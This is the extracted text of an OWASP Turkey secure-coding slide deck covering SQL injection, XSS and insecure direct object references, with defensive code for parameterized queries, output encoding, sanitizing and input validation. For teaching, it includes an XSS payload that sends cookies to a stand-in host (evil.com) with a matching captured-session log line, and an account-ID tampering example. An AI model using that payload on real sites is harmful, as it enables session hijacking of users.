View
328
Download
7
Embed Size (px)
Citation preview
SecureYourApp
OWASP-Turkey
Bünyamin Demir
Bünyamin Demir ( @bunyamindemir )– Lisans Kocaeli Üni. Matematik Bölümü– Yüksek Lisans Kocaeli Üni Fen-Bilimleri, Tez; Oracle Veritabanı
Güvenliği– Uygulama Geliştirici – OWASP Türkiye Bölüm Lideri– Sızma Testleri Uzmanı
• Web, Mobil, Network, SCADA, Wireless, Sosyal Mühendislik, ATM, DoS/DDoS ve Yük testi
• Kaynak kod analizi
– Eğitmen• Web/Mobil Uygulama Güvenlik Denetimi• Güvenli Kod Geliştirme• Veritabanı Güvenliği
2
3
OWASP
4
Why is OWASP Special?
• OWASP Top 10
• OWASP Zed Attack Proxy (ZAP)
• OpenSAMM
• Cheat Sheets
• ESAPI
• ASVS
• Testing Guide
• Development Guide5
OWASP Projects
6
OWASP ZAP Proxy / WebScarab
7
Application Security Verification Standart
Application Security
8
Two weeks of ethical hacking
Ten man-years of development
Business Logic Flaws
Code Flaws
Security Errors
Attacker vs. Defender
9
Web Application Threat Surface
10
11
OWASP TOP 10
A1 - Injection
12
Anatomy of SQL Injection Attack
13
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “’ AND password = ‘” & Request(“password”) & ”’”
What the developer intended:
username = john
password = password
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password = ‘password’
Anatomy of SQL Injection Attack
14
sql = “SELECT * FROM user_table WHERE username = ‘” & Request(“username”) & “ ’ AND password = ‘ ” & Request(“password”) & “ ’ ”
(This is DYNAMIC SQL and Untrusted Input)
What the developer did not intend is parameter values like:
username = john
password =
SQL Query:
SELECT * FROM user_table WHERE username = ‘john’ AND password =
causes all rows in the users table to be returned!
Bind Parameters (PHP)
15
$stmt = $dbh->prepare(”update users set
email=:new_email where id=:user_id”);
$stmt->bindParam(':new_email', $email);
$stmt->bindParam(':user_id', $id);
Parametrized Query (.NET)
16
SqlConnection objConnection = new
SqlConnection(_ConnectionString);
objConnection.Open();
SqlCommand objCommand = new SqlCommand(
"SELECT * FROM User WHERE Name = @Name
AND Password = @Password", objConnection);
objCommand.Parameters.Add("@Name",
NameTextBox.Text);
objCommand.Parameters.Add("@Password",
PassTextBox.Text);
SqlDataReader objReader =
objCommand.ExecuteReader();
Prepare Statement (Java)
17
String newName = request.getParameter("newName") ;
String id = request.getParameter("id");
//SQL
PreparedStatement pstmt = con.prepareStatement("UPDATE
EMPLOYEES SET NAME = ? WHERE ID = ?");
pstmt.setString(1, newName);
pstmt.setString(2, id);
//HQL
Query safeHQLQuery = session.createQuery("from
Employees where id=:empId");
safeHQLQuery.setParameter("empId", id);
A3 - XSS
18
A3 - XSS
19
Anatomy of XSS Attack
20
http://www.davshan.loc/friends.php?search=<abc>
<p>Result for <b><abc></b> :0<p><br />
http://www.davshan.loc/friends.php?search=<script>alert(1);</script>
Anatomy of XSS Attack
21
<script>document.write("<img src='http://www.evil.com?"+document.cookie+"'>")</script>
187.4.1.32 - - [28/Feb/2012:00:38:32 +0200] "GET /?PHPSESSID=ulc1141mm2tehjhfdqh1ktfas5 HTTP/1.1" 200 7425 "http://www.davshan.loc/....
OWASP Java Encoder Project
22
<%-- Basic HTML Context --%>
<body><b><%= Encode.forHtml(UNTRUSTED) %>" /></b></body>
<%-- HTML Attribute Context --%>
<input type="text" name="data" value="<%= Encode.forHtmlAttribute(UNTRUSTED) %>" />
<%-- Javascript Block context --%>
<script type="text/javascript">
var msg = "<%= Encode.forJavaScriptBlock(UNTRUSTED) %>"; alert(msg);
</script>
<%-- Javascript Variable context --%>
<button onclick="alert('<%= Encode.forJavaScriptAttribute(UNTRUSTED) %>');">click me</button>
Rich Text
23
OWASP HTML Sanitizer Project
24
PolicyFactory policy = new HtmlPolicyBuilder()
.allowElements("a")
.allowUrlProtocols("https")
.allowAttributes("href").onElements("a")
.requireRelNofollowOnLinks()
.build();
String safeHTML = policy.sanitize(untrustedHTML);
JQuery.Encoder
25
…
$(function() {
$(".div [name="+$.encoder.encodeForHTML($.encoder.canonicalize(window.location.hash.substr(1)+"]"));
});
…
encodeForHTMLAttribute, encodeForJavascript, encodeForURL, encodeForCSS
$('#profile_link').html('<a href="/profile/' + $.encoder.encodeForURL(userID) + '">Link</a>');
A4 – Insecure Direct Object References
26
• Attacker notices his acct parameter is 6065
?acct=6065
• He modifies it to a nearby number
?acct=6066
• Attacker views the victim’s account information
https://www.onlinebank.com/user?acct=6065
Best way to SecureYourApp
27
Input Validation
Input Validation - Java
28
public boolean validateUsername(String username) {
String usernamePattern = "^[a-zA-Z0-9]{6,12}$";
if (username == null) {
return false;
}
Pattern p = Pattern.compile(usernamePattern);
Matcher m = p.matcher(username);
if (!m.matches()) {
return false;
}
return true;
}
if (!validateUsername(username)) {
//invalid username
}
Input Validation - .NET
29
if (!Regex.IsMatch(TxtSinifAdi.Text, @"^[a-zA-Z0-9.\s]{1,10}$"))
{
// sinif ismi uygun değildir
}
30